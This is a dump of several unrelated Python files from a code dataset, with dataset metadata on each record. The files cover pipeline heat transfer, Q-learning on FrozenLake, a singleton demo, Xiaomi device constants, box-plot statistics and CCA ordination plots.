:param str ac: Accession\n :param str coordinate: Coordinate used. Must be either `p`, `c`, or `g`\n :param AltType alt_type: Type of alteration\n :param List errors: List of errors\n :param models.SequenceInterval ival: Sequence Interval\n :return: VRS Allele object\n \"\"\"\n if coordinate == \"c\":\n # TODO: Once we add support for ranges on c. 
coord\n            return None\n        if alt_type in {AltType.UNCERTAIN_DELETION, AltType.UNCERTAIN_DUPLICATION,\n                        AltType.DELETION_RANGE, AltType.DUPLICATION_RANGE}:\n            sstate = models.LiteralSequenceExpression(\n                sequence=\"\", type=\"LiteralSequenceExpression\"\n            )\n        else:\n            errors.append(\"No state\")\n            return None\n\n        return self.vrs_allele(ac, ival, sstate, alt_type, errors)\n","sub_path":"variation/vrs_representation.py","file_name":"vrs_representation.py","file_ext":"py","file_size_in_byte":9495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"530586516","text":"# ECDeise\n\nimport sys, getopt\n\ndef parseArgs(argv):\n    \"\"\" Parse command line arguments\n    sample calls\n    python3 Path_Finder.py -i 'DataSets/test_data.dat' -o '-1' -a 'astar' -d 3\n    python3 Path_Finder.py -i 'DataSets/set1.dat' -o 'DataSets/set1_outfile.dat' -a 'astar' -d 1\n\n    Args:\n        argv: command line arguments.\n        -h: help\n        -i: inputfile\n        -o: outputfile\n        -a: search algorithm\n        -d: distance heuristic\n    Returns:\n        inputfile: the inputfile path\n        outputfile: output file path\n        searchalg: search algorithm (currently only a_star implemented)\n        heuristic: distance heuristic (Euclid, Manhattan, Tchebychev)\n    Raises:\n        e: GetoptError.\n    \"\"\"\n    inputfile = None\n    outputfile = None\n    searchalg = 'astar'\n    heuristic = 1\n    width = 0\n    height = 0\n    obstacle = 0.0\n    try:\n        opts, args = getopt.getopt(argv,\"hi:o:a:d:x:y:b:\",[\"ifile=\",\"ofile=\",\"srchalg=\",\"heuristic=\",\"width=\",\"height=\",\"obstacle=\"])\n    except getopt.GetoptError:\n        displayCommandLineHelpText()\n        sys.exit(2)\n    if len(opts) < 2 or len(opts) > 10:\n        displayCommandLineHelpText()\n        sys.exit(2)\n    for opt, arg in opts:\n        if opt == '-h':\n            displayCommandLineHelpText()\n            sys.exit()\n        elif opt in (\"-i\", \"--ifile\"):\n            inputfile = arg\n        elif opt in (\"-o\", \"--ofile\"):\n            outputfile = arg\n        elif opt in (\"-a\", \"--srchalg\"):\n            searchalg = arg\n        elif opt in (\"-d\", \"--heuristic\"):\n            heuristic = arg\n        elif opt in (\"-x\", \"--width\"):\n            width = arg\n        elif opt in (\"-y\", \"--height\"):\n            height = arg\n        elif opt in (\"-b\", \"--obstacle\"):\n            obstacle = arg\n    print ('Applying search algorithm %s to data at %s writing results to %s' % (searchalg, inputfile, outputfile))\n    print (inputfile, outputfile, searchalg, heuristic, width, height, obstacle)\n    return inputfile, outputfile, searchalg, heuristic, width, height, obstacle\n\ndef displayCommandLineHelpText():\n    print ('With Map File Specified ... Path_Finder.py -i <inputfile> -o <outputfile> '\n           '-a <searchalg> e.g., astar, idastar -d <1,2,3> (1)Euclid, '\n           '(2)Manhattan, (3)Tchebychev ... Generate a Random Map By Parameter ... '\n           'Path_Finder.py -a <searchalg> e.g., astar, idastar -d <1,2,3> '\n           '(1)Euclid, (2)Manhattan, (3)Tchebychev '\n           '-x <width> -y <height> -b <obstacle>')\n\n","sub_path":"base/Utilities.py","file_name":"Utilities.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"95653239","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Date: 2021 01 27\n# Author: xDong@wandtec\n\n\nclass ControlPanel(object):\n    \"\"\"\n    A simple singleton implemented with the __new__ method\n    \"\"\"\n    __singleton = None\n\n    def __init__(self, pos):\n        self.pos = pos\n        print('User opened the control panel from', pos)\n\n    def __new__(cls, *args, **kwargs):\n        if cls.__singleton is None:\n            obj = object.__new__(cls)  # __new__ receives the class object itself\n            cls.__singleton = obj\n\n        print(cls.__singleton)\n        return cls.__singleton\n\n    def network_setting(self, name):\n        print('User configured a new network adapter:', name)\n\n\nc1 = ControlPanel('Beijing')\nc2 = ControlPanel('Shanghai')\nc3 = ControlPanel('Shenzhen')\nprint(c1, c2, c3)\nc1.network_setting('virtual NIC')\nc2.network_setting('wireless NIC')\nc3.network_setting('USB NIC')
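\n\n# Quick identity check (illustrative addition): all three names are bound to\n# the single cached instance, and because __init__ re-ran on that shared\n# object each time, pos now holds the value from the last call.\nassert c1 is c2 is c3\nprint(c1.pos, c2.pos, c3.pos)  # prints 'Shenzhen' three times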
\n","sub_path":"my_notes/探索设计模式-单例.py","file_name":"探索设计模式-单例.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"133112180","text":"\nDOMAIN = 'xiaomi_miot'\nDEFAULT_NAME = 'Xiaomi Miot'\n\nCONF_MODEL = 'model'\nCONF_XIAOMI_CLOUD = 'xiaomi_cloud'\nCONF_SERVER_COUNTRY = 'server_country'\nCONF_CONFIG_VERSION = 'config_version'\n\nSUPPORTED_DOMAINS = [\n    'sensor',\n    'binary_sensor',\n    'switch',\n    'light',\n    'fan',\n    'climate',\n    'cover',\n    'humidifier',\n    'media_player',\n    'camera',\n    'vacuum',\n    'air_quality',\n    'water_heater',\n    'device_tracker',\n    'number',\n]\n\nGLOBAL_CUSTOMIZES = {\n\n    'models': {\n        'chuangmi.plug.212a01': {\n            'chunk_properties': 7,\n        },\n        'cgllc.airm.cgdn1': {\n            'chunk_properties': 9,\n        },\n        'deerma.humidifier.jsq3': {\n            'chunk_properties': 6,\n        },\n        'yeelink.light.nl1': {\n            'interval_seconds': 15,\n        },\n        'lumi.sensor_motion.*': {\n            'interval_seconds': 15,\n            'motion_timeout': 60,\n        },\n        'lumi.sensor_magnet.*': {\n            'interval_seconds': 15,\n        },\n        'xiaomi.tv.*': {\n            'number_properties': 'speaker.volume',\n        },\n        '*.fishbowl.*': {\n            'number_properties': 'feeding_measure',\n        },\n        '*.feeder.*': {\n            'number_properties': 'feeding_measure',\n        },\n    },\n\n}\n\nTRANSLATION_LANGUAGES = {\n    'zh': {\n        'off': '关闭',\n        'idle': '空闲',\n        'busy': '工作中',\n        'pause': '暂停',\n        'fault': '错误',\n\n        'vacuum.mode': {\n            'Silent': '安静',\n            'Basic': '标准',\n            'Strong': '强力',\n        },\n\n        'washer.mode': {\n            'Daily Wash': '日常洗',\n            'Quick Wash': '快速洗',\n            'Delicate Wash': '轻柔洗',\n            'Down Coat': '羽绒服',\n            'Heavy Wash': '强力洗',\n            'User Define': '自定义',\n            'Rinse': '单漂洗',\n            'Spin': '单脱水',\n            'Cotton': '棉麻洗',\n            'Synthetic': '化纤洗',\n            'Shirt': '衬衣洗',\n            'Boiling': '高温洗',\n            'Wool': '羊毛洗',\n            'Drum Clean': '筒自洁',\n            'Baby Care': '婴童洗',\n            'Intensive': '精细洗',\n            'Jacket': '夹克洗',\n            'Wash Dry': '洗+烘',\n            'Underwear': '内衣洗',\n            'Dry': '单烘干',\n            'Dry Air Wash': '空气洗',\n            'Quick Wash Dry': '快洗烘',\n        },\n        'washer.drying_level': {\n            'moist': '微湿',\n            'normal': '正常',\n            'extra': '特干',\n            'none': '无烘干',\n        },\n    },\n}\n","sub_path":"custom_components/xiaomi_miot/core/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"432846120","text":"import sys\nimport math\n# sys.path.append('D:\\\\hossein sharifi 96-01-19\\\\behinesazan\\\\narmafzar\\\\myqtdesigner\\\\AgaQt')\n# 
sys.path.append('C:\\\\Users\\\\Hossein\\\\Desktop\\\\myqtdesigner\\\\96-02-20\\\\GasStationSoftware\\\\myqtdesigner\\\\AgaQt')\nfrom AgaQt import Gas\nfrom math import exp\nfrom scipy.optimize import fsolve\n\n\n\nclass Reynolds():\n ID = 0.4\n OD = 0.5\n pipeLength = 20\n Tin = 5\n T_air = 20\n\n def __init__(self, P , Tin):\n self.P = P\n self.Tin = Tin\n\n print('pipeLength, ID, OD ---> after init', self.pipeLength, self.ID, self.OD)\n\n g = Gas()\n g.P = P\n g.calculate(g.P, 273.15 + Tin)\n g2 = Gas()\n g2.calculate(g2.p_theta, g2.T_theta)\n Qdot = (100000/3600) * (g2.P * g.Z * g.T)/(g.P * g2.Z * g2.T)\n\n A = math.pi * self.ID * self.ID / 4\n V = Qdot/A\n # print('\\nV is = ' + str(V))\n\n self.g = g\n\n mdot = Qdot * g.rou\n self.mdot = mdot\n # print('mdot is = ' + str(math.fsum(mdot)))\n\n\n rou = g.rou * 0.001\n T = g.T * 1.8\n Mg = g.M\n X = 3.5 + 986 / T + 0.01 * Mg\n Y = 2.4 - 0.2 * X\n K = ((9.4 + 0.02 * Mg) * T ** 1.5) / (209 + 19 * Mg + T)\n mu = (K * 10 ** -4) * exp(X * rou ** Y)\n\n self.R = g.rou * V * self.ID / (mu * 0.001)\n # print('rou, V, mu', g.rou, V, mu)\n\n\n LtoDratio = self.pipeLength / self.ID\n\n\n k_gas = 0.05\n\n Pr = g.C_p * mu / k_gas # [mu] --> cp, [C_p] --> kJ/kg.K, [k_gas (thermal conductivity)] --> W/m.K\n x = 1000\n GzD = self.R * Pr / (x / self.ID)\n # print('Prandtl = ' + str(math.fsum(Pr)), '\\nGzD^-1 = ' + str(math.fsum(1 / GzD)))\n\n # entrance region\n if Pr > 0.1:\n Nu = 4.36\n h = k_gas * Nu / self.ID\n # print('h gas with Nu (4.36) is = ' + str(h))\n # Tin = self.Tin\n\n\n v_air = 5\n hair = 10.45 - v_air + 10 * v_air ** (1 / 2)\n # hair = 0.06\n gamma = g.M / 28.966\n # print(gamma)\n k_steel = 52 # thermal conductivity of steel is 45 W/m.K\n q_ = (self.T_air - Tin) / (1/hair + 1/h + ((self.OD - self.ID) / math.log(self.OD / self.ID)) / k_steel)\n Q = q_ * self.OD * math.pi * self.pipeLength\n # print('Qflux is = ' + str(q_), '\\nQ = ' + str(Q))\n\n deltaTpipe = Q / (mdot * g.C_p * 1000)\n # print('deltaT is = ' + str(math.fsum(deltaTpipe)))\n\n\n # print('Re * Pr = ' + str(math.fsum(Pr * self.R)))\n # print('Reynolds is = ' + str(math.fsum(self.R)))\n\n\n\n\n\n\n\n # self.m = 0\n friction = fsolve(self.friction, -7)\n friction = math.fabs(friction)\n deltaP = friction * g.rou * (V**2 / (2*self.ID)) * self.pipeLength\n P = deltaP * Qdot\n\n\n ##\n Nu = ((friction / 8) * (self.R - 1000) * Pr) / (1 + 12.7 * ((friction / 8) ** 0.5) * (Pr ** (2/3) - 1))\n h_gas = Nu * k_gas/self.ID\n # print(\"h gas = \" + str(math.fsum(h_gas)))\n # print('Nu is = ' + str(math.fsum(Nu)))\n\n\n self.h_Total = (1 / hair + 1 / h_gas + ((self.OD - self.ID) / math.log(self.OD / self.ID)) / k_steel)\n # print('H_total is = ' + str(self.h_Total))\n #\n Tm_o = fsolve(self.tOutCal, Tin + 1)\n # print(\"till hear!!!\")\n\n\n q_ = (self.T_air - self.Tin) / (1/hair + 1/h_gas + ((self.OD - self.ID) / math.log(self.OD / self.ID)) / k_steel)\n Q = q_ * self.OD * math.pi * self.pipeLength\n # print('Qflux is = ' + str(q_), '\\nQ = ' + str(Q))\n\n deltaTpipe = Q / (mdot * g.C_p * 1000)\n # print('deltaT is = ' + str(math.fsum(deltaTpipe)))\n\n\n ##\n Nu = 4.82 + 0.0185 * (self.R * Pr) ** 0.827\n\n h_gas = Nu * k_gas / self.ID\n # print(\"h gas = \" + str(math.fsum(h_gas)))\n # print('Nu is = ' + str(math.fsum(Nu)))\n\n q_ = (self.T_air - Tin) / (1 / hair + 1 / h_gas + ((self.OD - self.ID) / math.log(self.OD / self.ID)) / k_steel)\n Q = q_ * self.OD * math.pi * self.pipeLength\n # print('Qflux is = ' + str(q_), '\\nQ = ' + str(Q))\n\n deltaTpipe = Q / (mdot * g.C_p * 1000)\n # 
print('deltaT is = ' + str(math.fsum(deltaTpipe)))\n\n self.h_Total = 1 / (1 / hair + 1 / h_gas + ((self.OD - self.ID) / math.log(self.OD / self.ID)) / k_steel)\n # print('H_total is = ' + str(self.h_Total))\n\n # Tm_o = fsolve(self.tOutCal, Tin + 1)\n # print(\"till hear!!!\")\n #\n # print('new one')\n # print('h_total is = ' + str(self.h_Total))\n self.Tout = (self.Tin - self.T_air) * exp(-math.pi*self.ID * self.pipeLength * self.h_Total / (self.mdot * g.C_p * 1000)) + self.T_air\n print('Tout is = ' + str(self.Tout))\n print('Qdot = ' + str(self.mdot * g.C_p * 1000 * (self.Tout - self.Tin)))\n\n\n\n\n def friction(self, f):\n # self.m +=1\n if f <= 0:\n f = math.fabs(f)\n\n\n return 1 / math.sqrt(f) + 2 * math.log2(0.01 / (0.4 * 3.7) + 2.57 / (self.R * math.sqrt(f)))\n\n def tOutCal(self, tout):\n # print('H total is = ' + str(self.h_Total))\n # print('T air is = ' + str(self.T_air), '\\nT in is = ' + str(self.Tin))\n # print(\"T_out is = \" + str(math.fsum(tout)))\n\n # if To >= self.T_air:\n # To = self.T_air - 1\n deltaTm = ((self.T_air - tout) - (self.T_air - self.Tin)) / math.log((self.T_air - tout)/(self.T_air - self.Tin))\n\n return ((self.mdot * self.g.C_p * 1000) * ((tout - self.Tin) / deltaTm)) / (math.pi * self.ID * self.pipeLength) \\\n - self.h_Total\n\n def calcul(self, pipelength, ID, OD):\n self.pipeLength = pipelength\n self.ID = ID\n self.OD = OD\n print('pipeLength, ID, OD', self.pipeLength, self.ID, self.OD)\n self.__init__(self.P, self.Tin)\n\n\n\nif __name__ == \"__main__\":\n R = Reynolds(5000, 5)\n R.calcul(50, 0.5, 0.7)\n","sub_path":"GasLineCalTest.py","file_name":"GasLineCalTest.py","file_ext":"py","file_size_in_byte":5840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"560600952","text":"#!/usr/bin/env python3\n# scope2.py - scope rules\n\nname = \"scope\" # name is global\nnum = 55 # num is global\n\ndef myfunc(str): # THIS HIDES str BUILT-IN\n new = name + \" \" + str # new, str are local\n num = 100 # num local, hides global\n new += \" \" + str(num) # str is built-in\n return new\n\nanswer = myfunc(\"rules\") # answer is global\nprint(num) # prints 55\nprint(answer) # prints scope rules 100\n\n#####################################\n#\n# $ scope2.py\n# Traceback (most recent call last):\n# File \"./scope2.py\", line 13, in \n# answer = myfunc(\"rules\") # answer is global\n# File \"./scope2.py\", line 10, in myfunc\n# new += \" \" + str(num) # str is built-in\n# TypeError: 'str' object is not callable\n#\n","sub_path":"learning/training/python/py3/pgms/sec4/scope2.py","file_name":"scope2.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"14006224","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n@source: https://www.youtube.com/watch?v=VYOq-He90bE&list=PLlMkM4tgfjnKsCWav-Z2F-MMFRx-2gMGG&index=7\r\n@written by: Sung KIM\r\n@modified by: Hyung-Kwon Ko\r\n@created on: Jul 17 19:03 2019\r\n@last modified date: 2019-07-19\r\n\"\"\"\r\n\r\n# import required packages\r\nimport numpy as np\r\nimport gym\r\nimport matplotlib.pyplot as plt\r\nfrom gym.envs.registration import register\r\n \r\n# parameter setting\r\ngamma = 0.99 # discounted reward (factor)\r\nnum_episodes = 2000 # number of iteration\r\nlearning_rate = 0.85 # learning rate\r\n\r\n# setting module\r\nclass Lab5:\r\n def __init__(self, id):\r\n self.env = gym.make(id)\r\n \r\n # Use E & E as default, but can change by setting noise = 1\r\n def 
    \r\n    # Use E & E as default, but can change by setting noise = 1\r\n    def algorithm(self, iter = 2000, noise = 0, gamma = 0.99, lr = 0.85):\r\n        '''\r\n        @param iter: number of iterations\r\n        @param noise: E&E or Noise\r\n        @param gamma: discount factor\r\n        @param lr: learning rate\r\n        @return Q: Q-Table\r\n        @return rList: set of reward as list\r\n        '''\r\n        \r\n        # Create lists to contain total rewards and steps per episode\r\n        rList = []\r\n\r\n        #Initialize table with all zeros\r\n        Q = np.zeros([self.env.observation_space.n, self.env.action_space.n])\r\n\r\n        for i in range(iter):\r\n            # Reset environment and get first new observation\r\n            state = self.env.reset()\r\n            rAll = 0\r\n            done = False\r\n            \r\n            # 'e' is for E & E algorithm\r\n            e = 1. / ((i / 100) + 1)\r\n            \r\n            # The Q-Table learning algorithm\r\n            while not done:\r\n                if(noise):\r\n                    # Add noise - Choose an action by greedily (with noise) picking from Q table\r\n                    action = np.argmax(Q[state, :] + np.random.randn(1, self.env.action_space.n) / (i+1))\r\n                else:\r\n                    # Choose an action by e value\r\n                    if(np.random.rand(1) < e):\r\n                        action = self.env.action_space.sample()\r\n                    else:\r\n                        action = np.argmax(Q[state, :])\r\n                \r\n                # Get new state and reward from environment\r\n                new_state, reward, done, _ = self.env.step(action)\r\n                \r\n                # Update Q table\r\n                Q[state, action] = (1-lr) * Q[state, action] + lr*(reward+ gamma*np.max(Q[new_state, :]))\r\n\r\n                rAll += reward\r\n                state = new_state\r\n            rList.append(rAll)\r\n        return Q, rList\r\n\r\n# run program\r\nif __name__ == \"__main__\":\r\n\r\n    # Set env\r\n    l5 = Lab5('FrozenLake-v0')\r\n\r\n    # User chooses\r\n    noise = input(\"E/E(0) or Noise(1)? \")\r\n    \r\n    # Run algorithm\r\n    Q, rList = l5.algorithm(iter = num_episodes, noise = int(noise), gamma = gamma, lr=learning_rate)\r\n\r\n    # Print out Success rate and Q-Table\r\n    print(\"Success rate: \", str(sum(rList)/num_episodes))\r\n    print(\"Final Q-Table Values\")\r\n    print(Q)\r\n\r\n    # Outcome of the discounted factor is shown well\r\n    plt.bar(range(len(rList)), rList, color=\"blue\")\r\n    plt.show()\r\n","sub_path":"week3/rl_lab5_hkko.py","file_name":"rl_lab5_hkko.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"532685389","text":"\"\"\"Exercise 2:\nWrite a program that asks for a number between 0 and 10 (both inclusive).\nIf the user types a number outside the valid range, the program asks for\nthe value again as many times as necessary.\"\"\"\n\nnro = int(input(\" ingrese un número entre 0 y 10 : \"))\n\nwhile nro < 0 or nro >10:\n    print (\" El número ingresado no se encuentra dentro del rango \")\n    nro=int(input(\"Ingrese un número entre 0 y 10: \"))\n\nif 0 <= nro <= 10: # the original tested 'nro in range(1,10)', which wrongly excluded 0 and 10\n    print(\"felicitaciones, cumpliste la consigna!!\")","sub_path":"eje2guia2.py","file_name":"eje2guia2.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"329770199","text":"\"\"\"\nSummary class to provide quick access to a statistical summary\nin a way useful for creating box plots.\n\n\"\"\"\n\nimport numpy\nimport pandas\n\n\nclass Summary:\n\n    def __init__(self, df, key, val, k=1.5):\n        \"\"\"\n        :param df: a pandas data frame\n        :param key: a column name (categorical)\n        :param val: a column name (numerical)\n        :param k: multiplier (to detect outliers), default to 1.5\n        \"\"\"\n        self.df = df\n        self.key = key\n        self.xval = val\n        self._k = k\n\n        self.summary_table = self._summarize()\n        self.outliers = self.outliers() # caches the result and shadows the outliers() method on this instance\n\n    def __str__(self):\n
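        # Editor's usage sketch (added; the column names here are hypothetical):\n        #   s = Summary(df, key=\"region\", val=\"price\")\n        #   print(s)          # framed per-level summary table\n        #   print(s.outliers) # rows outside the q1 - k*IQR / q3 + k*IQR fences\n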
\"Summary of {} by {}:\\n{}\\n{}\\n{}\"\n return MSG.format(self.xval, self.key, \"-\" * 100, self.summary_table, \"-\" * 100)\n\n def _summarize(self):\n \"\"\"Wraps summarize_x method\n :param df: pandas data frame\n\n Return a summary table for each level of key column\n \"\"\"\n groups = self.df[[self.key, self.xval]].groupby(self.key)\n dx = [Summary.summarize_x(x=dfx[self.xval],\n category_value=name,\n k=self._k)\n for name, dfx in groups]\n dx = pandas.concat(dx)\n dx.rename(columns={\"category\": self.key}, inplace=True)\n return dx\n\n def outliers(self):\n \"\"\"Retrurns outliers, if any.\"\"\"\n # if not self.summary:\n # self.summary = self.summarize()\n\n dx = pandas.merge(self.df[[self.key, self.xval]],\n self.summary_table[[self.key, 'upper', 'lower']],\n how=\"left\", on=self.key)\n outlier_ids = (dx[self.xval] > dx['upper']) | ((dx[self.xval] < dx['lower']))\n return dx[outlier_ids]\n\n @staticmethod\n def summarize_x(x, category_value=\"default\", k=1.5):\n \"\"\"Calculates base and extended summary\n\n base summary:\n min, q1, median, q3, max\n\n extended summary:\n iqr - Interquartile range\n upper - Upper bound for inliers\n lower - Lower bound for inliers\n stem_upper - Upper Steam(for box plot)\n steam_lower - Lower Steam value(for box plot)\n \"\"\"\n\n # base summary\n dx = pandas.DataFrame({\n \"category\": category_value,\n \"min\": [numpy.min(x)],\n \"q1\": [numpy.percentile(x, 25)],\n \"median\": [numpy.percentile(x, 50)],\n \"q3\": [numpy.percentile(x, 75)],\n \"max\": [numpy.max(x)]\n })\n\n dx['iqr'] = dx['q3'] - dx['q1']\n dx['upper'] = dx['q3'] + k * dx['iqr']\n dx['lower'] = dx['q1'] - k * dx['iqr']\n dx['stem_upper'] = dx[['upper', 'max']].apply(min, axis=1)\n dx['stem_lower'] = dx[['lower', 'min']].apply(max, axis=1)\n return dx\n","sub_path":"bokeh_templates/utils/summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"290124237","text":"import os\nassert os.environ['CONDA_DEFAULT_ENV']=='skbio_env', 'You should use the conda environment skbio_env'\nimport numpy as np\nfrom skbio.stats.ordination import cca\nimport pandas as pd\nimport matplotlib.pylab as plt\nfrom copy import copy\nimport matplotlib.colors as mcolors\nimport seaborn as sns\nfrom matplotlib.patches import Patch\n\nredFspecies = True\n\nspl = [6,11,25,250]\ntits = ['(a)', '(b)', '(c)', '(d)']\nAllvars = False\nnoise = [True,False]\nplott=True#False#\ndirRead = '/Users/nooteboom/Documents/GitHub/cluster_TM/cluster_SP/density/dens/ordination/'\n\nminss = [100,200, 300, 400, 500, 600, 700, 800, 900,1000] # The s_min values\nxiss = np.arange(0.0001,0.01, 0.0001) # The xi values\n\nfig, ax = plt.subplots(2,3, figsize=(16,16),\n gridspec_kw={'width_ratios':[1,1,0.08]})\nax[0,0].get_shared_y_axes().join(ax[1,0])\nax[0,1].get_shared_y_axes().join(ax[1,1])\nfor axs in ax[:, 2]:\n axs.remove()\ngs = ax[1, 2].get_gridspec()\naxbig = fig.add_subplot(gs[:, 2])\nsns.set(style='whitegrid',context='paper', font_scale=2)\nfs=20\nvs = np.array([-1,1])*0.8\n\nfor spi, sp in enumerate(spl):\n print(sp)\n # keep track of the results\n # F and D stand for Foram and Dino\n # noise keeps track of CCA results if noisy locations are included\n # cluster keeps track of results if noisy locations are excluded\n FNoise = np.zeros((len(minss), len(xiss)))\n DNoise = np.zeros((len(minss), len(xiss)))\n FCluster = np.zeros((len(minss), len(xiss)))\n DCluster = np.zeros((len(minss), 
    \n    for mini,mins in enumerate(minss):\n        print('min: %d'%(mins))\n        for xii, xis in enumerate(xiss):\n            opts = [\"xi\", xis]\n            \n            if(redFspecies):\n                ff = np.load('loops/redF/prepredF_CCA_sp%d_smin%d%s_%.5f.npz'%(sp, mins, opts[0], opts[1]))\n            else:\n                ff = np.load(dirRead+'loops/prep_CCA_sp%d_smin%d%s_%.5f.npz'%(sp, mins, opts[0], opts[1]))\n            #%%\n            envs = ff['envnames']\n            if(Allvars):\n                envsplt = ff['envnames']\n            else:\n                envsplt = ff['envnames']\n                envsplt = ['temp','N']\n            Flabels = ff['Flabels']\n            Flabelsfull = copy(Flabels)\n            Fenv = ff['Fenv']\n            for ni,n in enumerate(noise):\n                envs = ff['envnames']\n                envsplt = ['temp','N']\n                Flabels = ff['Flabels']\n                Fenv = ff['Fenv']\n                Fenv_nn = ff['Fenv_nn']\n                \n                #%% Foraminifera\n                data = ff['data']\n                sites = np.array(['site %d'%(i) for i in range(data.shape[0])])\n                species = np.array(['species %d'%(i) for i in range(data.shape[1])])\n                \n                if(not n):\n                    args = np.where(Flabels!=-1)\n                    data = data[args]\n                    Flabels = Flabels[args]\n                    sites = sites[args]\n                    Fenv = Fenv[args]\n                    Fenv_nn = Fenv_nn[args]\n                \n                X = pd.DataFrame(data, sites, species)\n                Y = pd.DataFrame(Fenv, sites, envs)\n                Y_nn = pd.DataFrame(Fenv_nn, sites, envs)\n                \n                # del Y['N']\n                del Y['Si']\n                # del Y['P']\n                # del Y['temp']\n                # del Y['salt']\n                \n                if(len(Y.values)!=0):\n                    if(Y.shape[0]>1):\n                        CCA = cca(Y,X)\n                    else:\n                        FCluster[mini,xii] = np.nan\n                    \n                    if(n):\n                        FNoise[mini,xii] = np.sum(CCA.proportion_explained[:len(CCA.proportion_explained)//2])\n                    else:\n                        FCluster[mini,xii] = np.sum(CCA.proportion_explained[:len(CCA.proportion_explained)//2])\n                else:\n                    FCluster[mini,xii] = np.nan\n    #%% Load the significance levels according to the subsamples\n    its = 999\n    siglevel = 0.05\n    if(redFspecies):\n        ffsig = np.load('randomsubsamples_redF_sp%d_its%d.npz'%(sp,its))\n    else:\n        ffsig = np.load('randomsubsamples_sp%d_its%d.npz'%(sp,its))\n    percF = ffsig['Fperc']\n    assert percF.shape==FNoise.shape\n    \n    color1 = plt.cm.copper(np.linspace(0, 1, int(100*(1-siglevel))))\n    color2 = plt.cm.Blues(np.linspace(0.8, 1, int(100*siglevel)))\n    # combine them and build a new colormap\n    cmapp = mcolors.LinearSegmentedColormap.from_list('my_colormap', np.vstack((color2, color1)))\n    fs=20\n    \n    # Set the x ticks:\n    num_ticks = len(xiss)\n    frac = 6\n    xticks = np.linspace(0, (len(xiss) - 1), num_ticks, dtype=int) # int, not np.int (removed in modern NumPy)\n    xticklabels = []\n    for i, idx in enumerate(xticks):\n        if(i%frac==0):\n            xticklabels.append(np.round(xiss[idx] / 1e-3,5))\n        else:\n            xticklabels.append('')\n    \n    FN = (FCluster-FNoise)\n    FN[FN==0] = np.nan\n    FN = pd.DataFrame(data=FN, index=minss, columns=xiss)\n    \n    if(False): # if a two-sided test is used\n        sigF = np.full(percF.shape, '')\n        for i in range(percF.shape[0]):\n            for j in range(percF.shape[1]):\n                if(np.array(FN)[i,j]>=0):\n                    if(percF[i,j]>siglevel/2):\n                        sigF[i,j] = 'l'\n                elif(np.array(FN)[i,j]<0):\n                    if((1-percF[i,j])>siglevel/2):\n                        sigF[i,j] = 'l'\n    else: # otherwise a one-sided test is used\n        sigF = (percF<=siglevel).astype(str)\n        sigF[sigF=='False'] = 'l'\n        sigF[sigF=='True'] = ''\n    \n    #%\n    \n    # Create the colormap\n    colors2 = plt.cm.RdGy(np.linspace(0, 1, 128))[::-1]\n    # combine them and build a new colormap\n    cmap1 = mcolors.LinearSegmentedColormap.from_list('my_colormap', colors2)\n    cmap1.set_bad(\"tab:blue\") # set the color for nan values\n    cmap1.set_under(\"tab:blue\") # set the color for insignificant values\n    \n    # Set the x ticks:\n    num_ticks = len(xiss)\n    frac = 6\n    xticks = np.linspace(0, (len(xiss) - 1), num_ticks, dtype=int)\n    xticklabels = []\n    for i, idx in enumerate(xticks):\n
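        # Editor's note (added): only every frac-th tick receives a numeric label (in\n        # units of 1e-3), so the xi axis stays legible; the rest get empty strings.\n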
        if(i%frac==0):\n            xticklabels.append(np.round(xiss[idx] / 1e-3,5))\n        else:\n            xticklabels.append('')\n    \n    \n    DN = (DCluster-DNoise)\n    FN = (FCluster-FNoise)\n    FN[FN==0] = np.nan\n    DN[DN==0] = np.nan\n    \n    DN = pd.DataFrame(data=DN, index=minss, columns=xiss)\n    FN = pd.DataFrame(data=FN, index=minss, columns=xiss)\n    \n    # The figure\n    \n    if(spi==0):\n        g1 = sns.heatmap(FN,cmap=cmap1,ax=ax[spi//2, spi%2], vmin=vs[0], vmax=vs[1], \n                         xticklabels=xticklabels, annot=sigF, fmt='', cbar_ax=axbig)\n    else:\n        g1 = sns.heatmap(FN,cmap=cmap1,ax=ax[spi//2, spi%2], vmin=vs[0], vmax=vs[1], \n                         xticklabels=xticklabels, annot=sigF, fmt='', cbar=False)\n    ax[spi//2, spi%2].set_yticklabels(minss,fontsize=fs-6, rotation='horizontal')\n    if(spi%2==0):\n        g1.set_ylabel('$s_{min}$', fontsize=fs)\n    else:\n        g1.set_yticklabels([])\n    if(spi//2==1):\n        ax[spi//2, spi%2].set_xticklabels(xticklabels, fontsize=fs-6, rotation='vertical')\n        ax[spi//2, spi%2].set_xticks(xticks+0.5)\n        g1.set_xlabel('$\\\\xi\\cdot10^{-3}$', fontsize=fs)\n    else:\n        g1.set_xticklabels([])\n        g1.set_xticks([])\n    g1.set_title(tits[spi], fontsize=fs)\n\nlegend_elements = [Patch(facecolor=cmap1(np.nan),\n                         label='-no cluster\\n', linewidth=0)]\nleg = axbig.legend(handles=legend_elements, loc='upper left',\n                   bbox_to_anchor=(-0.525, -0.1005, 0.1, 0.1), frameon=False,\n                   handletextpad=-0.25)\n\nfor patch in leg.get_patches():\n    patch.set_height(41)\n    patch.set_width(30)\n    \n    # g2 = sns.heatmap(FN,cmap=cmap1,cbar=True,ax=ax[1], vmin=-0.35, vmax=0.35, \n    #                  cbar_ax=ax[0,2], yticklabels=False, annot=sigF, fmt='')\n    # 